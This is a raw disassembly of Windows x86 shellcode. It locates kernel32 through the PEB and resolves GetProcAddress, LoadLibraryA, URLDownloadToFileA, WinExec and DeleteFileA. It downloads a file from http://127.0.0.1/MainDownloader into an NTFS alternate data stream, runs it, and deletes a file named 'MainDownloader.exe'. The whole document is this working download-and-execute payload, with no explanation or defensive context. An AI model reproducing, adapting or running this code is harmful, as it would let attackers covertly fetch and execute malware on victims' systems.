00401000 <.text>:
  401000: 31 c9                         xorl    %ecx, %ecx
  401002: 64 8b 41 30                   movl    %fs:0x30(%ecx), %eax
  401006: 8b 40 0c                      movl    0xc(%eax), %eax
  401009: 8b 70 14                      movl    0x14(%eax), %esi
  40100c: ad                            lodsl   (%esi), %eax
  40100d: 96                            xchgl   %esi, %eax
  40100e: ad                            lodsl   (%esi), %eax
  40100f: 8b 58 10                      movl    0x10(%eax), %ebx
  401012: 8b 53 3c                      movl    0x3c(%ebx), %edx
  401015: 01 da                         addl    %ebx, %edx
  401017: 8b 52 78                      movl    0x78(%edx), %edx
  40101a: 01 da                         addl    %ebx, %edx
  40101c: 8b 72 20                      movl    0x20(%edx), %esi
  40101f: 01 de                         addl    %ebx, %esi
  401021: 31 c9                         xorl    %ecx, %ecx
  401023: 41                            incl    %ecx
  401024: ad                            lodsl   (%esi), %eax
  401025: 01 d8                         addl    %ebx, %eax
  401027: 81 38 47 65 74 50             cmpl    $0x50746547, (%eax)     # imm = 0x50746547
  40102d: 75 f4                         jne     0x401023 <.text+0x23>
  40102f: 81 78 04 72 6f 63 41          cmpl    $0x41636f72, 0x4(%eax)  # imm = 0x41636F72
  401036: 75 eb                         jne     0x401023 <.text+0x23>
  401038: 81 78 08 64 64 72 65          cmpl    $0x65726464, 0x8(%eax)  # imm = 0x65726464
  40103f: 75 e2                         jne     0x401023 <.text+0x23>
  401041: 8b 72 24                      movl    0x24(%edx), %esi
  401044: 01 de                         addl    %ebx, %esi
  401046: 66 8b 0c 4e                   movw    (%esi,%ecx,2), %cx
  40104a: 49                            decl    %ecx
  40104b: 8b 72 1c                      movl    0x1c(%edx), %esi
  40104e: 01 de                         addl    %ebx, %esi
  401050: 8b 14 8e                      movl    (%esi,%ecx,4), %edx
  401053: 01 da                         addl    %ebx, %edx
  401055: 31 c9                         xorl    %ecx, %ecx
  401057: 53                            pushl   %ebx
  401058: 52                            pushl   %edx
  401059: 51                            pushl   %ecx
  40105a: 68 61 72 79 41                pushl   $0x41797261             # imm = 0x41797261
  40105f: 68 4c 69 62 72                pushl   $0x7262694c             # imm = 0x7262694C
  401064: 68 4c 6f 61 64                pushl   $0x64616f4c             # imm = 0x64616F4C
  401069: 54                            pushl   %esp
  40106a: 53                            pushl   %ebx
  40106b: ff d2                         calll   *%edx
  40106d: 83 c4 0c                      addl    $0xc, %esp
  401070: 59                            popl    %ecx
  401071: 50                            pushl   %eax
  401072: 31 c0                         xorl    %eax, %eax
  401074: 66 b8 6c 6c                   movw    $0x6c6c, %ax            # imm = 0x6C6C
  401078: 50                            pushl   %eax
  401079: 68 6f 6e 2e 64                pushl   $0x642e6e6f             # imm = 0x642E6E6F
  40107e: 68 75 72 6c 6d                pushl   $0x6d6c7275             # imm = 0x6D6C7275
  401083: 54                            pushl   %esp
  401084: ff 54 24 10                   calll   *0x10(%esp)
  401088: 83 c4 0c                      addl    $0xc, %esp
  40108b: 50                            pushl   %eax
  40108c: 31 c0                         xorl    %eax, %eax
  40108e: 66 b8 65 41                   movw    $0x4165, %ax            # imm = 0x4165
  401092: 50                            pushl   %eax
  401093: 68 6f 46 69 6c                pushl   $0x6c69466f             # imm = 0x6C69466F
  401098: 68 6f 61 64 54                pushl   $0x5464616f             # imm = 0x5464616F
  40109d: 68 6f 77 6e 6c                pushl   $0x6c6e776f             # imm = 0x6C6E776F
  4010a2: 68 55 52 4c 44                pushl   $0x444c5255             # imm = 0x444C5255
  4010a7: 54                            pushl   %esp
  4010a8: ff 74 24 18                   pushl   0x18(%esp)
  4010ac: ff 54 24 24                   calll   *0x24(%esp)
  4010b0: 83 c4 14                      addl    $0x14, %esp
  4010b3: 50                            pushl   %eax
  4010b4: 31 c0                         xorl    %eax, %eax
  4010b6: b8 78 65 63 23                movl    $0x23636578, %eax       # imm = 0x23636578
  4010bb: 50                            pushl   %eax
  4010bc: 83 6c 24 03 23                subl    $0x23, 0x3(%esp)
  4010c1: 68 57 69 6e 45                pushl   $0x456e6957             # imm = 0x456E6957
  4010c6: 54                            pushl   %esp
  4010c7: ff 74 24 1c                   pushl   0x1c(%esp)
  4010cb: ff 54 24 1c                   calll   *0x1c(%esp)
  4010cf: 83 c4 08                      addl    $0x8, %esp
  4010d2: 50                            pushl   %eax
  4010d3: 31 c0                         xorl    %eax, %eax
  4010d5: b8 6c 65 41 23                movl    $0x2341656c, %eax       # imm = 0x2341656C
  4010da: 50                            pushl   %eax
  4010db: 83 6c 24 03 23                subl    $0x23, 0x3(%esp)
  4010e0: 68 74 65 46 69                pushl   $0x69466574             # imm = 0x69466574
  4010e5: 68 44 65 6c 65                pushl   $0x656c6544             # imm = 0x656C6544
  4010ea: 54                            pushl   %esp
  4010eb: ff 74 24 24                   pushl   0x24(%esp)
  4010ef: ff 54 24 24                   calll   *0x24(%esp)
  4010f3: 83 c4 0c                      addl    $0xc, %esp
  4010f6: 50                            pushl   %eax
  4010f7: 31 c0                         xorl    %eax, %eax
  4010f9: b8 64 65 72 23                movl    $0x23726564, %eax       # imm = 0x23726564
  4010fe: 50                            pushl   %eax
  4010ff: 83 6c 24 03 23                subl    $0x23, 0x3(%esp)
  401104: 68 6e 6c 6f 61                pushl   $0x616f6c6e             # imm = 0x616F6C6E
  401109: 68 6e 44 6f 77                pushl   $0x776f446e             # imm = 0x776F446E
  40110e: 68 2f 4d 61 69                pushl   $0x69614d2f             # imm = 0x69614D2F
  401113: 68 2e 30 2e 31                pushl   $0x312e302e             # imm = 0x312E302E
  401118: 68 32 37 2e 30                pushl   $0x302e3732             # imm = 0x302E3732
  40111d: 68 3a 2f 2f 31                pushl   $0x312f2f3a             # imm = 0x312F2F3A
  401122: 68 68 74 74 70                pushl   $0x70747468             # imm = 0x70747468
  401127: 54                            pushl   %esp
  401128: 31 c0                         xorl    %eax, %eax
  40112a: b0 72                         movb    $0x72, %al
  40112c: 50                            pushl   %eax
  40112d: 68 6f 61 64 65                pushl   $0x6564616f             # imm = 0x6564616F
  401132: 68 6f 77 6e 6c                pushl   $0x6c6e776f             # imm = 0x6C6E776F
  401137: 68 78 65 3a 64                pushl   $0x643a6578             # imm = 0x643A6578
  40113c: 68 65 72 2e 65                pushl   $0x652e7265             # imm = 0x652E7265
  401141: 68 6c 6f 61 64                pushl   $0x64616f6c             # imm = 0x64616F6C
  401146: 68 44 6f 77 6e                pushl   $0x6e776f44             # imm = 0x6E776F44
  40114b: 68 4d 61 69 6e                pushl   $0x6e69614d             # imm = 0x6E69614D
  401150: 54                            pushl   %esp
  401151: 31 c0                         xorl    %eax, %eax
  401153: 50                            pushl   %eax
  401154: 31 c0                         xorl    %eax, %eax
  401156: 50                            pushl   %eax
  401157: ff 74 24 08                   pushl   0x8(%esp)
  40115b: ff 74 24 30                   pushl   0x30(%esp)
  40115f: 31 c0                         xorl    %eax, %eax
  401161: 50                            pushl   %eax
  401162: ff 54 24 64                   calll   *0x64(%esp)
  401166: 83 c4 48                      addl    $0x48, %esp
  401169: 31 c0                         xorl    %eax, %eax
  40116b: b0 72                         movb    $0x72, %al
  40116d: 50                            pushl   %eax
  40116e: 68 6f 61 64 65                pushl   $0x6564616f             # imm = 0x6564616F
  401173: 68 6f 77 6e 6c                pushl   $0x6c6e776f             # imm = 0x6C6E776F
  401178: 68 78 65 3a 64                pushl   $0x643a6578             # imm = 0x643A6578
  40117d: 68 65 72 2e 65                pushl   $0x652e7265             # imm = 0x652E7265
  401182: 68 6c 6f 61 64                pushl   $0x64616f6c             # imm = 0x64616F6C
  401187: 68 44 6f 77 6e                pushl   $0x6e776f44             # imm = 0x6E776F44
  40118c: 68 4d 61 69 6e                pushl   $0x6e69614d             # imm = 0x6E69614D
  401191: 54                            pushl   %esp
  401192: 31 c0                         xorl    %eax, %eax
  401194: 50                            pushl   %eax
  401195: ff 74 24 04                   pushl   0x4(%esp)
  401199: ff 54 24 30                   calll   *0x30(%esp)
  40119d: 83 c4 24                      addl    $0x24, %esp
  4011a0: 31 c0                         xorl    %eax, %eax
  4011a2: b0 72                         movb    $0x72, %al
  4011a4: 50                            pushl   %eax
  4011a5: 68 6f 61 64 65                pushl   $0x6564616f             # imm = 0x6564616F
  4011aa: 68 6f 77 6e 6c                pushl   $0x6c6e776f             # imm = 0x6C6E776F
  4011af: 68 78 65 3a 64                pushl   $0x643a6578             # imm = 0x643A6578
  4011b4: 68 65 72 2e 65                pushl   $0x652e7265             # imm = 0x652E7265
  4011b9: 68 6c 6f 61 64                pushl   $0x64616f6c             # imm = 0x64616F6C
  4011be: 68 44 6f 77 6e                pushl   $0x6e776f44             # imm = 0x6E776F44
  4011c3: 68 4d 61 69 6e                pushl   $0x6e69614d             # imm = 0x6E69614D
  4011c8: 54                            pushl   %esp
  4011c9: ff 34 24                      pushl   (%esp)
  4011cc: ff 54 24 28                   calll   *0x28(%esp)
  4011d0: 83 c4 24                      addl    $0x24, %esp
  4011d3: 31 c0                         xorl    %eax, %eax
  4011d5: 66 b8 78 65                   movw    $0x6578, %ax            # imm = 0x6578
  4011d9: 50                            pushl   %eax
  4011da: 68 65 72 2e 65                pushl   $0x652e7265             # imm = 0x652E7265
  4011df: 68 6c 6f 61 64                pushl   $0x64616f6c             # imm = 0x64616F6C
  4011e4: 68 44 6f 77 6e                pushl   $0x6e776f44             # imm = 0x6E776F44
  4011e9: 68 4d 61 69 6e                pushl   $0x6e69614d             # imm = 0x6E69614D
  4011ee: 54                            pushl   %esp
  4011ef: ff 34 24                      pushl   (%esp)
  4011f2: ff 54 24 1c                   calll   *0x1c(%esp)
  4011f6: 83 c4 18                      addl    $0x18, %esp